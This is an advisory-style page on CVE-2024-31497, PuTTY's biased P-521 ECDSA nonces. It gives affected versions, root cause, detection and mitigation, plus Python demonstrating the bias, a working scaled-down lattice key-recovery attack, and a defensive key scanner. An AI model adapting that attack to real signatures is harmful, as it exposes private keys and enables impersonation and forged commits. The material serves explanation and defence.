CVE-2024-31497 Overview
CVE-2024-31497 is a cryptographic vulnerability in PuTTY versions 0.68 through 0.80: the ECDSA nonces PuTTY generated when signing with a NIST P-521 key were biased, and an attacker who collects roughly 60 signatures made with such a key can recover the private key. Only P-521 keys are affected, not ECDSA keys on P-256 or P-384, RSA keys or Ed25519 keys. The attack is especially dangerous where signatures are public, as with SSH-signed Git commits in public repositories.
Two attack scenarios matter in practice. First, an adversary may already hold enough signatures: Git services that support SSH commit signing publish every signature, so a user who signed commits with a P-521 key held in Pageant (directly or over agent forwarding) has left dozens of them in public repositories. Second, a malicious SSH server operator receives a fresh signature every time the victim authenticates; after about 60 logins the operator can derive the private key and use it against every other service that trusts the same key.
Critical Impact
Private key compromise lets an attacker forge signed commits, a software supply-chain attack on every Git repository the key signs for, and authenticate to every SSH service that trusts the key.
Affected Products
- PuTTY versions 0.68 through 0.80
- FileZilla Client before version 3.67.0
- WinSCP before version 6.3.3
- TortoiseGit before version 2.15.0.1
- TortoiseSVN through version 1.14.6
- Fedora 38, 39, and 40 (distribution packages of PuTTY)
The non-PuTTY products are affected because they embed PuTTY's SSH code or ship its Plink and Pageant tools; any other software that bundles a PuTTY release in this range is affected in the same way.
Discovery Timeline
- April 15, 2024 - PuTTY 0.81 released with the fix; the issue was reported by Fabian Bäumer and Marcus Brinkmann (Ruhr University Bochum)
- April 15, 2024 - CVE-2024-31497 published to NVD
- November 4, 2025 - Last updated in NVD database
Technical Details for CVE-2024-31497
Vulnerability Analysis
The vulnerability stems from how PuTTY generated the ECDSA nonce k when signing with NIST P-521 keys. ECDSA requires a fresh nonce for every signature that is indistinguishable from uniform over [1, q-1], where q is the order of the curve's base point. Deterministic derivation is acceptable when the result meets that bar (RFC 6979 does), but PuTTY derived k by hashing the private key and the message with SHA-512 and reducing the 512-bit digest modulo q. A 512-bit value reduced modulo a 521-bit q is unchanged, so the top 9 bits of every P-521 nonce were zero. A nonce biased in a known way lets an attacker apply lattice-based attacks on the hidden number problem to recover the private key.
With the top 9 bits of each nonce known, every signature leaks about 9 bits of information about the private key, and around 60 signatures (9 x 58 >= 521) are enough to solve for it. The signatures themselves are not secret: an SSH server sees one each time the key authenticates, and SSH-signed Git commits carry them in the clear.
The attack also works on signatures made in the past. A user who authenticated with a vulnerable PuTTY and a P-521 key to a server that kept the signatures, or who published SSH-signed commits, may already have leaked enough material for key recovery; no further interaction with the victim is needed.
Root Cause
NVD classifies CVE-2024-31497 as CWE-338 (Use of Cryptographically Weak Pseudo-Random Number Generator). The concrete defect is the one described above: PuTTY's deterministic nonce derivation produced a 512-bit SHA-512 output and reduced it modulo the 521-bit group order of P-521, so the reduction did nothing and the 9 most significant bits of every nonce were zero. For P-256 and P-384 the same construction is sound in practice, because q is shorter than the digest and the bias from the reduction is negligible.
ECDSA depends on the nonce being unpredictable and uniform over the full range. A signature (r, s) on message hash h satisfies s*k = h + r*d (mod q), so k = u + t*d (mod q) with t = r*s^-1 and u = h*s^-1, both computable by anyone holding the signature. Knowing that every k is smaller than 2^512 turns a collection of such equations into an instance of the hidden number problem, which the Lenstra–Lenstra–Lovász (LLL) lattice reduction algorithm solves once enough equations are available.
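As an added illustration of this root cause (example code written for this page, not PuTTY's source), the following reproduces the arithmetic: a SHA-512 digest reduced modulo the group order of each NIST curve. The byte layout fed to the hash is an assumption and does not matter; only the digest length relative to the size of q does.

```python
"""Why a SHA-512-mod-q nonce is biased for P-521 and only P-521 (added example, not PuTTY code)."""
import hashlib

# Group orders of the NIST prime curves (FIPS 186-4 / SEC 2)
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
P384_ORDER = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973
P521_ORDER = int("01" + "F" * 65 + "A51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409", 16)


def putty_style_nonce(private_key: int, msg_hash: bytes, q: int) -> int:
    """Nonce as a 512-bit SHA-512 digest reduced mod q, the pre-0.81 construction.
    The input layout (key || message hash) is an assumption; the bias does not depend on it."""
    key_bytes = private_key.to_bytes((q.bit_length() + 7) // 8, "big")
    digest = hashlib.sha512(key_bytes + msg_hash).digest()
    return int.from_bytes(digest, "big") % q


def leaked_top_bits(q: int) -> int:
    """Nonce bits an attacker knows for free. A 512-bit digest reduced modulo a q wider than
    512 bits is returned unchanged, so its top q.bit_length() - 512 bits are always zero."""
    return max(0, q.bit_length() - 512)


def min_signatures(q: int):
    """Lower bound on signatures needed: leaked bits must at least cover the key's bit length.
    Returns None when nothing leaks."""
    leak = leaked_top_bits(q)
    return -(-q.bit_length() // leak) if leak else None  # ceiling division


def max_nonce_bits(q: int, samples: int = 200) -> int:
    """Largest nonce bit length observed for a constructed key over `samples` messages."""
    key = int.from_bytes(hashlib.sha256(b"constructed demo key").digest() * 3, "big") % q
    return max(
        putty_style_nonce(key, hashlib.sha256(b"message %d" % i).digest(), q).bit_length()
        for i in range(samples)
    )


if __name__ == "__main__":
    for name, q in (("P-256", P256_ORDER), ("P-384", P384_ORDER), ("P-521", P521_ORDER)):
        print(f"{name}: q has {q.bit_length()} bits, nonces reach at most "
              f"{max_nonce_bits(q)} bits, {leaked_top_bits(q)} bits leak per signature, "
              f"signatures needed: {min_signatures(q)}")
```

For P-256 and P-384 the sampled nonces fill the whole range of q; for P-521 none ever exceeds 512 bits, and the ceiling of 521/9 gives the 58-signature floor behind the "approximately 60" figure.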
Attack Vector
Anyone who can collect enough ECDSA signatures made with the victim's NIST P-521 key can run the attack; no access to the victim's machine is needed. Collection vectors include:
Public Git Services: Git commits and tags signed with SSH keys carry the signature inside the object, so platforms such as GitHub expose every signature in a public repository. An attacker collects them passively by cloning the repository.
Malicious SSH Server: Any SSH server the victim authenticates to, including one the victim trusts and connects to deliberately, receives a fresh signature on every login. An operator who logs them can recover the key after about 60 logins and then use it against other services that accept the same key.
Agent Forwarding: When Pageant is forwarded to a remote host, software on that host can ask the agent to sign arbitrary data. A compromised or malicious host can therefore request the required signatures within a single session rather than waiting for logins, and commits signed on that host through the forwarded agent end up in public repositories as above.
Once approximately 60 signatures are collected, the attacker solves the resulting hidden number problem with lattice reduction. A proof-of-concept exploit is available at the CVE-2024-31497 PoC Repository, and further analysis of ECDSA lattice attacks can be found at the ECDSA Break Analysis Repository.
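To make the lattice step concrete, here is an added, self-contained example written for this page (not PuTTY code and not the PoC linked above). It simulates a victim signing with nonces whose top bits are zero, then runs the hidden-number-problem lattice with a textbook LLL. The parameters are constructed and scaled down (a 61-bit group order, 16 zero bits per nonce, 8 signatures) so that pure-Python LLL finishes in well under a second; the lattice is the same one used against P-521's 9 zero bits and roughly 60 signatures. Curve point multiplication is replaced by a hash of the nonce, because the attack only ever treats r as a public scalar.

```python
"""Toy hidden-number-problem lattice attack on ECDSA with known-zero nonce top bits.
Constructed example: toy parameters, hash in place of point multiplication, not PuTTY code."""
from fractions import Fraction
import hashlib
import random

Q = 2**61 - 1      # toy prime group order (stand-in for P-521's 521-bit q)
LEAK_BITS = 16     # top bits of every nonce that are always zero (9 in PuTTY's P-521 bug)
N_SIGS = 8         # 8 * 16 = 128 leaked bits against a 61-bit key leaves LLL ample slack


def sign_biased(d, h, q, rng, leak_bits):
    """ECDSA signing algebra s = k^-1 (h + r d) mod q with a short nonce k < 2^(bits(q) - leak_bits).
    r stands in for x(kG) mod q: a hash of k keeps it a public value determined by the nonce."""
    k = rng.randrange(1, 1 << (q.bit_length() - leak_bits))
    r = int.from_bytes(hashlib.sha256(k.to_bytes(8, "big")).digest(), "big") % q
    s = pow(k, -1, q) * (h + r * d) % q
    return r, s, h


def lll_reduce(basis, delta=Fraction(3, 4)):
    """LLL reduction (Cohen, Alg. 2.6.3) keeping exact rational Gram-Schmidt data mu, B=||b*||^2."""
    b = [list(row) for row in basis]
    n = len(b)
    dot = lambda u, v: sum(x * y for x, y in zip(u, v))
    mu = [[Fraction(0)] * n for _ in range(n)]
    B = [Fraction(0)] * n
    bstar = []
    for i in range(n):                       # one initial Gram-Schmidt pass
        v = [Fraction(x) for x in b[i]]
        for j in range(i):
            mu[i][j] = dot(b[i], bstar[j]) / B[j]
            v = [x - mu[i][j] * y for x, y in zip(v, bstar[j])]
        bstar.append(v)
        B[i] = dot(v, v)

    def reduce(k, l):                        # size-reduce b_k by the nearest multiple of b_l
        c = round(mu[k][l])
        if c:
            b[k] = [x - c * y for x, y in zip(b[k], b[l])]
            mu[k][l] -= c
            for j in range(l):
                mu[k][j] -= c * mu[l][j]

    k = 1
    while k < n:
        reduce(k, k - 1)
        if B[k] < (delta - mu[k][k - 1] ** 2) * B[k - 1]:   # Lovasz condition fails: swap
            m = mu[k][k - 1]
            Bn = B[k] + m * m * B[k - 1]
            mu[k][k - 1] = m * B[k - 1] / Bn
            B[k] = B[k - 1] * B[k] / Bn
            B[k - 1] = Bn
            b[k], b[k - 1] = b[k - 1], b[k]
            for j in range(k - 1):
                mu[k][j], mu[k - 1][j] = mu[k - 1][j], mu[k][j]
            for i in range(k + 1, n):
                t = mu[i][k]
                mu[i][k] = mu[i][k - 1] - m * t
                mu[i][k - 1] = t + mu[k][k - 1] * mu[i][k]
            k = max(k - 1, 1)
        else:
            for l in range(k - 2, -1, -1):
                reduce(k, l)
            k += 1
    return b


def recover_key(sigs, q, leak_bits):
    """Build the HNP lattice for k_i = u_i + t_i*d (mod q) with k_i < B and read d off a short vector.
    Rows (scaled by q to stay integral): q^2*e_i, (q*t_i..., B, 0), (q*u_i..., 0, q*B).
    The vector (q*k_1, ..., q*k_n, d*B, q*B) lies in the lattice and is unusually short."""
    n = len(sigs)
    B = 1 << (q.bit_length() - leak_bits)
    t = [r * pow(s, -1, q) % q for r, s, h in sigs]
    u = [h * pow(s, -1, q) % q for r, s, h in sigs]
    basis = [[q * q if j == i else 0 for j in range(n + 2)] for i in range(n)]
    basis.append([q * ti for ti in t] + [B, 0])
    basis.append([q * ui for ui in u] + [0, q * B])
    for row in lll_reduce(basis):
        if abs(row[-1]) != q * B:
            continue
        sign = 1 if row[-1] > 0 else -1
        d = (sign * row[n] // B) % q
        # a genuine solution makes every recovered nonce fall below the bound B
        if all((ui + ti * d) % q < B for ui, ti in zip(u, t)):
            return d
    return None


def demo(seed=31497):
    """Victim signs N_SIGS constructed messages with biased nonces; attacker recovers d."""
    rng = random.Random(seed)                # fixed seed so the run is reproducible
    d = rng.randrange(1, Q)                  # victim's private key
    sigs = []
    for i in range(N_SIGS):
        h = int.from_bytes(hashlib.sha256(b"commit %d" % i).digest(), "big") % Q
        sigs.append(sign_biased(d, h, Q, rng, LEAK_BITS))
    return d, recover_key(sigs, Q, LEAK_BITS)


if __name__ == "__main__":
    d, recovered = demo()
    print(f"private key   {d}\nrecovered key {recovered}\nsuccess={recovered == d}")
```

What decides success is the inequality n * L > bits(q) with some slack for the reduction, where L is the number of known-zero bits per nonce and n the number of signatures; with L = 9 and a 521-bit q that is why roughly 58 to 60 P-521 signatures suffice, and why a single signature from an unbiased P-256 or P-384 key gives the attacker nothing.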
Detection Methods for CVE-2024-31497
Indicators of Compromise
- Exposure indicator: NIST P-521 SSH keys used with PuTTY versions 0.68-0.80, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, or TortoiseSVN through 1.14.6 (treat the key, not just the software, as compromised)
- Unauthorized access to systems using SSH authentication where the victim's P-521 key was previously used
- Unexpected Git commits signed with the victim's key appearing in repositories
- Authentication logs showing access from unfamiliar IP addresses using legitimate P-521 keys
Detection Strategies
- Audit SSH key inventory to identify any NIST P-521 keys that may have been used with vulnerable software versions
- Review Git commit histories on public repositories for signatures made with potentially compromised keys
- Monitor authentication logs for SSH connections using P-521 keys from unexpected sources or geolocations
- Implement alerting for any new SSH key usage patterns that deviate from established baselines
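For the key-inventory audit above, here is an added example written for this page (not OpenSSH or PuTTY code). It parses authorized_keys-format lines, including a leading options field, identifies ECDSA keys on nistp521 from the curve name inside the key blob rather than trusting the type prefix, and computes the same SHA256 fingerprint that ssh-keygen -l prints, so hits can be correlated with sshd log entries. The sample entries are constructed: the ECDSA points are fake bytes of the right length and the Ed25519 key is all zeros. The same line format is used by *.pub files, so the scanner works on workstation key material too.

```python
"""Find NIST P-521 keys in authorized_keys / *.pub material and print ssh-keygen-style fingerprints.
Added example; sample entries below are constructed, not real keys."""
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """SSH wire-format string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _read_ssh_string(blob: bytes, offset: int):
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    return blob[start:start + length], start + length


def fingerprint(blob: bytes) -> str:
    """Same format as `ssh-keygen -l`: SHA256: plus unpadded base64 of SHA-256 over the raw key blob."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_key(line: str):
    """Return (key_type, curve_or_None, fingerprint, comment), or None for blank/comment lines.
    Tolerates a leading options field such as from="..." the way sshd does."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = line.split()
    # the key type is the first token that looks like one; anything before it is the options field
    idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
    if idx is None or idx + 1 >= len(fields):
        return None
    key_type, b64 = fields[idx], fields[idx + 1]
    comment = " ".join(fields[idx + 2:])
    blob = base64.b64decode(b64)
    inner_type, off = _read_ssh_string(blob, 0)
    if inner_type.decode() != key_type:
        raise ValueError(f"type prefix {key_type} does not match blob type {inner_type!r}")
    curve = None
    if key_type.startswith("ecdsa-sha2-"):
        curve = _read_ssh_string(blob, off)[0].decode()    # e.g. "nistp521", taken from the blob
    return key_type, curve, fingerprint(blob), comment


def find_p521_keys(text: str):
    """(fingerprint, comment) for every ECDSA key on the P-521 curve in authorized_keys text."""
    hits = []
    for line in text.splitlines():
        parsed = parse_authorized_key(line)
        if parsed and parsed[1] == "nistp521":
            hits.append((parsed[2], parsed[3]))
    return hits


def _synthetic_ecdsa_key(curve: str, seed: bytes) -> str:
    """Syntactically valid ECDSA entry with a fake point of the right length (constructed data)."""
    coord_len = {"nistp256": 32, "nistp384": 48, "nistp521": 66}[curve]
    point = (b"\x04" + hashlib.sha512(seed).digest() * 3)[:1 + 2 * coord_len]
    blob = _ssh_string(f"ecdsa-sha2-{curve}".encode()) + _ssh_string(curve.encode()) + _ssh_string(point)
    return f"ecdsa-sha2-{curve} {base64.b64encode(blob).decode()} alice@putty-laptop"


# Constructed sample: one P-521 key behind an options field, one P-256 key, one Ed25519 key
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    'from="10.0.0.0/8" ' + _synthetic_ecdsa_key("nistp521", b"seed-521"),
    _synthetic_ecdsa_key("nistp256", b"seed-256"),
    "ssh-ed25519 " + base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(b"\x00" * 32)).decode() + " bob@ws",
])

if __name__ == "__main__":
    for fp, comment in find_p521_keys(SAMPLE_AUTHORIZED_KEYS):
        print(f"P-521 key needs rotation: {fp} {comment}")
```

Reading the curve name from the blob matters because the prefix is just text that a user can edit; the blob is what sshd actually verifies against, and its SHA256 fingerprint is what appears in "Accepted publickey" log lines.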
Monitoring Recommendations
- Make sure sshd logs key fingerprints on critical servers: at the default LogLevel INFO sshd already records the type and SHA256 fingerprint of every accepted key ("Accepted publickey for ... ssh2: ECDSA SHA256:..."), and LogLevel VERBOSE also records keys that were offered but rejected. The log names the algorithm but not the curve, so correlate the fingerprints with the key inventory to tell P-521 keys apart
- Deploy endpoint detection solutions to identify vulnerable PuTTY, FileZilla, WinSCP, TortoiseGit, and TortoiseSVN versions across the enterprise
- Monitor Git platforms for commit signing activity and correlate with known vulnerable client usage
- Implement network monitoring to detect SSH connections to unusual destinations that could indicate key compromise testing
How to Mitigate CVE-2024-31497
Immediate Actions Required
- Immediately upgrade PuTTY to version 0.81 or later, which contains the fix for the biased nonce generation
- Update all affected software: FileZilla to 3.67.0 or later, WinSCP to 6.3.3 or later, TortoiseGit to 2.15.0.1 or later, and TortoiseSVN to a release newer than 1.14.6
- Assume any NIST P-521 keys used with vulnerable versions are compromised and should be rotated
- Revoke and regenerate affected SSH keys, then update authorized_keys files on all servers
- Consider switching to Ed25519 keys, which are not affected by this vulnerability (ECDSA keys on P-256 and P-384 were not affected either, because their group orders are shorter than the 512-bit digest)
Patch Information
PuTTY version 0.81 addresses this vulnerability by abandoning the SHA-512-mod-q nonce derivation in favour of the RFC 6979 deterministic nonce construction for all DSA and ECDSA key types. The patch details are available in the PuTTY source repository and the PuTTY changelog. The official vulnerability advisory is documented in the PuTTY wishlist.
For Fedora users, updated packages are available through the standard package management system. Debian users should refer to the Debian LTS Announcement for patch availability.
Workarounds
- If immediate patching is not possible, stop using NIST P-521 keys and switch to Ed25519 or RSA keys (P-256 and P-384 ECDSA keys are unaffected as well)
- Avoid using Pageant agent forwarding until the software is updated
- Restrict SSH authentication to trusted servers only and avoid connecting to untrusted SSH endpoints
- Remove any P-521 public keys from authorized_keys files on critical systems until key rotation is complete
# Identify and rotate P-521 keys (run on the workstation that holds the keys)
# List every OpenSSH public key with its size and type; P-521 keys print as "521 SHA256:... (ECDSA)"
for f in ~/.ssh/*.pub; do ssh-keygen -l -f "$f"; done
# PuTTY-format keys (.ppk) can be inspected with the Unix puttygen, or loaded into PuTTYgen on Windows
puttygen old-key.ppk -O fingerprint
# Generate a new Ed25519 key as a replacement (recommended)
ssh-keygen -t ed25519 -C "replacement-key@example.com"
# Install the new key on each remote server
ssh-copy-id -i ~/.ssh/id_ed25519.pub user@remote-server
# Remove the old P-521 key from the server's authorized_keys by matching its exact key blob
# (matching on the comment field is unreliable: the comment is optional and freely editable)
OLD_BLOB=$(awk '{print $2}' ~/.ssh/id_ecdsa.pub)
ssh user@remote-server "grep -vF '$OLD_BLOB' ~/.ssh/authorized_keys > ~/.ssh/authorized_keys.new; mv ~/.ssh/authorized_keys.new ~/.ssh/authorized_keys"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.


